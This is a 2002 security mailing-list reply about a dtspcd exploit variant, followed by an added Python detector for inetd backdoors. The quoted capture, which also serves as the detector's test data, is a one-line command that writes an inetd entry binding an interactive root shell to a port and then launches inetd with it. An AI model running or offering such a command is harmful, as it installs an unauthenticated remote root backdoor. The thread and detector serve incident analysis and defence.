On Thu, 14 Feb 2002 16:07:10 EST, "Nathan W. Labadie" <ab0781at_private> said:
> Until last week, all the dtspcd exploits I'd seen had been the same
> (inetd, ingreslock, /tmp/x, etc). Looks like there is a new one floating
> around. The ASCII output looks something like this:
>
> /bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z;
> /usr/sbin/inetd -s /tmp/z;
> sleep 10;

Hmm... hardly new. Somebody's retrofitted a /tmp/bob onto a new
delivery vector, it looks like (though I've not checked the capture)...

-- 
Valdis Kletnieks
Computer Systems Senior Engineer
Virginia Tech
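Added example, not part of the original thread or written by either poster: a small detector that flags the pattern in the quoted capture, namely an inetd.conf-style entry whose server program is a shell, and an inetd started against a configuration file outside /etc. The function name, the shell list and the benign sample are assumptions made for illustration.

```python
import re

# Quoted in the post above: the ASCII payload seen in the dtspcd capture.
CAPTURED = ("/bin/ksh -c echo 'rje stream tcp nowait root /bin/sh sh -i'> /tmp/z; "
            "/usr/sbin/inetd -s /tmp/z; sleep 10;")
# Constructed benign sample: a normal service entry and a default inetd start.
BENIGN = ("ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd\n"
          "/usr/sbin/inetd -s\n")

# Assumed list of shell basenames worth flagging as an inetd server program.
SHELLS = {"sh", "ksh", "csh", "bash", "tcsh", "zsh"}

# inetd.conf entry: service socktype proto wait-flag user server-path args...
ENTRY = re.compile(
    r"(?P<service>[\w-]+)\s+(?P<sock>stream|dgram)\s+(?P<proto>\w+)\s+"
    r"(?P<wait>(?:no)?wait)\s+(?P<user>\S+)\s+(?P<server>/\S+)\s+"
    r"(?P<args>[^'\";\n]*)"
)
# inetd invoked with an explicit configuration file path after its options.
INETD_RUN = re.compile(
    r"(?:\S*/)?inetd\s+(?:-\w+\s+)*(?P<conf>/\S+?)(?=[;\s]|$)"
)

def find_inetd_backdoors(text):
    """Return findings for shell-backed inetd entries and inetd runs
    that load a configuration file from outside /etc."""
    findings = []
    for m in ENTRY.finditer(text):
        if m["server"].rsplit("/", 1)[-1] in SHELLS:
            findings.append({
                "kind": "shell-service",
                "service": m["service"],
                "user": m["user"],
                "server": m["server"],
                "interactive": "-i" in m["args"].split(),
            })
    for m in INETD_RUN.finditer(text):
        if not m["conf"].startswith("/etc/"):
            findings.append({"kind": "inetd-alt-config", "conf": m["conf"]})
    return findings

if __name__ == "__main__":
    for finding in find_inetd_backdoors(CAPTURED):
        print(finding)
```

The same function can be run over process-accounting command lines or strings extracted from a packet capture; the port name (rje here, ingreslock in the older variant the post mentions) is reported but not used as the match key.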